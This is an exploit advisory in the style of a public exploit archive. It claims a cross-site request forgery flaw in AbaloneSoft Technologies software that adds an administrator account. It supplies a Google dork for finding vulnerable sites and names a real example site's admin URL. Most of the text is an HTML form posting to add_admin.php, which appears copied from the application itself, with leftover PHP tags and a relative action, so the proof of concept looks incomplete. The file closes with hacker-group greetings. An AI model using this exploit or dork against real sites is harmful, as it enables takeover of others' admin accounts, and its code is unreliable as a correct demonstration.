AbaloneSoft Technologies suffers from a cross site request forgery vulnerability. This code demonstrates the addition of an administrator user.
fd85ae5f9d2e72863747de284cba34876fb883c695e979c155997ad42b6a0ecd
###
# Title : AbaloneSoft Technologies CSRF Vulnerability (Add Admin)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Download : http://www.yuvajobs.com/download-Abalonesoft+Technologies-placement-papers
# platform : php
# Impact : Add Admin
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# Go0gle Dork : " Powered by AbaloneSoft Technologies "
###
# Demo : http://[Target]/[Path]/html/admin/add_admin.html
# Example : http://www.odolyss.com/html/admin/add_admin.html
==================[ HTML CODE ]====================
***************************************************
<script language="javascript" type="text/javascript" src="http://[LocalHost]/../js/admin/checkadmin.js"></script>
<form id="add_admin" name="add_admin" method="post" action="add_admin.php">
<td width=100% height="100%" valign=top>
<table width="100%" height="50%" class="innertable" border="0" align="center" cellpadding="1" cellspacing="1">
<tr colfont="4" height=10><td></td></tr>
<tr>
<td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="1%" valign="top" style="padding-left:5px;"> </td>
<TD width="99%" valign="top" style="padding-left:10px;" align="top" >
<table width="100%" border="0" cellspacing="1" cellpadding="0" vspace="0" class="border" align="center" >
<tr>
<td valign="top"><table width="100%" border="0" cellspacing="1" cellpadding="0" >
<!--<tr> <td align="center" height="5" colspan="2"> </td> </tr>-->
<tr >
<td colspan="3" height="19" style="padding-left:5px" class="tdbg">Add User </td>
</tr>
<tr>
<td align="center" height="5" colspan="3"> </td>
</tr>
<tr>
<td height="1" colspan="3" class="blacktext" ></td>
</tr>
<tr >
<td height="10" colspan="3" valign="middle" class="normal_text"><span class="asterisk">* Field is mandatory</span></td>
</tr>
<!--<tr>
<td width="50%" colspan="2" class="normal_text" align="left" style="padding-bottom:5px; padding-left:300px;"><font color="#E66F17"><?=$msg?> </font></td>
</tr>-->
<tr>
<td height="41" colspan="3" style="padding-left:400px" class="error_text"><?=$msg_admin?><?=$errorMessage;?>
<?=$oldperror?></td>
</tr>
<tr>
<td width="50%" align="right" class="normal_text" style="left:200px"> User Name : </td>
<td width="25%"><input name="txtuser" type="text" id="txtuser" regexp="JSVAL_RX_FC" value="<?= $adminName; ?>" required=1 err="Please enter admin name." class="textbox1" />
<font color="#FF0000">*</font>
<!-- <span class="catagories">*</span>-->
<input name="adminid" type="hidden" value="<?=$id?>" /></td>
<td width="25%"><div id="erruser" name="erruser" class="error_text"></div></td>
</tr>
<tr>
<td height="31" align="right" class="normal_text">New Password : </td>
<td><input type="password" name="txtnpass" id="txtnpass" required="1" err="Please enter new password." regexp="JSVAL_RX_PS"class="textbox1"/>
<font color="#FF0000">*</font>
<!--<span class="catagories"> *</span>--></td>
<td><div id="errpass" name="errpass" class="error_text"></div></td>
</tr>
<tr>
<td height="31" align="right" class="normal_text">Conform Password : </td>
<td><input type="password" name="txt_cpass" minlength="5" required="1" err="Please enter valid password." regexp="JSVAL_RX_PS" class="textbox1" id="txt_cpass" />
<font color="#FF0000">*</font>
<!--<span class="catagories"> *</span>--></td>
<td><div id="errcpass" name="errcpass" class="error_text"></div></td>
</tr>
<tr>
<td align="right" class="normal_text">E-mail ID : </td>
<td><input name="txt_email" type="text" id="txt_email" class="textbox1" value="<?= $adminMail?>" required=1 err="Please enter valid e-mail address." regexp="JSVAL_RX_NEWEMAIL" />
<font color="#FF0000">*</font>
<!--<span class="catagories"> *</span>--></td>
<td><div id="errmail" name="errmail" class="error_text"></div></td>
</tr>
<tr>
<td height="5"></td>
</tr>
<tr>
<td align="right"><input type="hidden" name="Submit" value="Submit" /></td>
<td colspan="2" style="padding-left:25px;"><input type="button" class="button" name="Submit" value="Submit" onclick="allval();" /></td>
</tr>
<tr>
<td height="7"></td>
</tr>
</table></td>
</tr>
</table>
</TD></tr></table>
<!------------------- content end here ----------------------->
</td></tr></table>
</form>
</td>
</tr>
</td>
</tr>
</table>
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
# Greets All Bad Boys (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================